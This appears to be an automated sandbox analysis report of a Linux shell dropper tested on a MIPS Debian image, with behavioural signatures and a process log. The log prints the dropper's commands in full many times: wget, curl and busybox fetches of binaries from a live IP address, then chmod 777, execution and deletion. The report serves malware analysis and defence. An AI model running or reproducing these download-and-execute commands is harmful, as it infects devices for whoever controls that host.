Analysis Overview
SHA256
9c20942d674c25dfd8b64629ccdce039560dd91bb6820d8896b1483d1564e21d
Threat Level: Shows suspicious behavior
The file a14f6217427019a86c4d002cef1e30a2.bin was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-14 01:33
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-14 01:33
Reported
2024-11-14 01:36
Platform
debian9-mipsbe-20240611-en
Max time kernel
85s
Max time network
88s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR | /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR | N/A |
| N/A | /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 | /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 | N/A |
| N/A | /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 | /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 | N/A |
| N/A | /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY | /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY | N/A |
| N/A | /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W | /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W | N/A |
| N/A | /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 | /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 | N/A |
| N/A | /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv | /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv | N/A |
| N/A | /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa | /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa | N/A |
| N/A | /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW | /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW | N/A |
| N/A | /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE | /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE | N/A |
| N/A | /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD | /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD | N/A |
| N/A | /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 | /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 | N/A |
| N/A | /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj | /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj | N/A |
| N/A | /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs | /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs | N/A |
| N/A | /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv | /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv | N/A |
| N/A | /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa | /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa | N/A |
| N/A | /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW | /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW | N/A |
| N/A | /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj | /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj | N/A |
| N/A | /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs | /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs | N/A |
| N/A | /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE | /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE | N/A |
| N/A | /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD | /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD | N/A |
| N/A | /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 | /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 | N/A |
| N/A | /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR | /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR | N/A |
| N/A | /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 | /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 | N/A |
| N/A | /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 | /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 | N/A |
| N/A | /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY | /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY | N/A |
| N/A | /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W | /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W | N/A |
| N/A | /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 | /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW | /usr/bin/curl | N/A |
| File opened for modification | /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W | /usr/bin/curl | N/A |
| File opened for modification | /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa | /usr/bin/curl | N/A |
Processes
/tmp/4aa5ab11bd6f613478208b74ffefcd67594912de8b15bc52edf572a0367d01e0.sh
[/tmp/4aa5ab11bd6f613478208b74ffefcd67594912de8b15bc52edf572a0367d01e0.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/bin/chmod
[chmod 777 C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR
[./C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/bin/rm
[rm C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/usr/bin/wget
[wget http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/bin/chmod
[chmod 777 jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4
[./jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/bin/rm
[rm jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/usr/bin/wget
[wget http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/bin/chmod
[chmod 777 No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5
[./No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/bin/rm
[rm No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/usr/bin/wget
[wget http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/bin/chmod
[chmod 777 nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY
[./nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/bin/rm
[rm nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/usr/bin/wget
[wget http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/bin/chmod
[chmod 777 7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W
[./7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/bin/rm
[rm 7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/usr/bin/wget
[wget http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/bin/chmod
[chmod 777 6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1
[./6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/bin/rm
[rm 6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/usr/bin/wget
[wget http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/bin/chmod
[chmod 777 pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv
[./pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/bin/rm
[rm pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/usr/bin/wget
[wget http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/bin/chmod
[chmod 777 IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa
[./IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/bin/rm
[rm IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/usr/bin/wget
[wget http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/bin/chmod
[chmod 777 L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW
[./L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/bin/rm
[rm L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/usr/bin/wget
[wget http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/bin/chmod
[chmod 777 gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE
[./gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/bin/rm
[rm gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/usr/bin/wget
[wget http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/bin/chmod
[chmod 777 Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD
[./Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/bin/rm
[rm Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/usr/bin/wget
[wget http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/bin/chmod
[chmod 777 eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65
[./eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/bin/rm
[rm eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/usr/bin/wget
[wget http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/bin/chmod
[chmod 777 FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj
[./FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/bin/rm
[rm FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/usr/bin/wget
[wget http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/bin/chmod
[chmod 777 MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs
[./MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/bin/rm
[rm MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/usr/bin/wget
[wget http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/bin/chmod
[chmod 777 pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv
[./pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/bin/rm
[rm pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/usr/bin/wget
[wget http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/bin/chmod
[chmod 777 IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa
[./IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/bin/rm
[rm IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/usr/bin/wget
[wget http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/bin/chmod
[chmod 777 L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW
[./L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/bin/rm
[rm L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/usr/bin/wget
[wget http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/bin/chmod
[chmod 777 FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj
[./FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/bin/rm
[rm FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/usr/bin/wget
[wget http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/bin/chmod
[chmod 777 MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs
[./MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/bin/rm
[rm MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/usr/bin/wget
[wget http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/bin/chmod
[chmod 777 gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE
[./gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/bin/rm
[rm gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/usr/bin/wget
[wget http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/bin/chmod
[chmod 777 Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD
[./Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/bin/rm
[rm Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/usr/bin/wget
[wget http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/bin/chmod
[chmod 777 eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65
[./eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/bin/rm
[rm eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/usr/bin/wget
[wget http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/bin/chmod
[chmod 777 C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR
[./C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/bin/rm
[rm C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/usr/bin/wget
[wget http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/usr/bin/curl
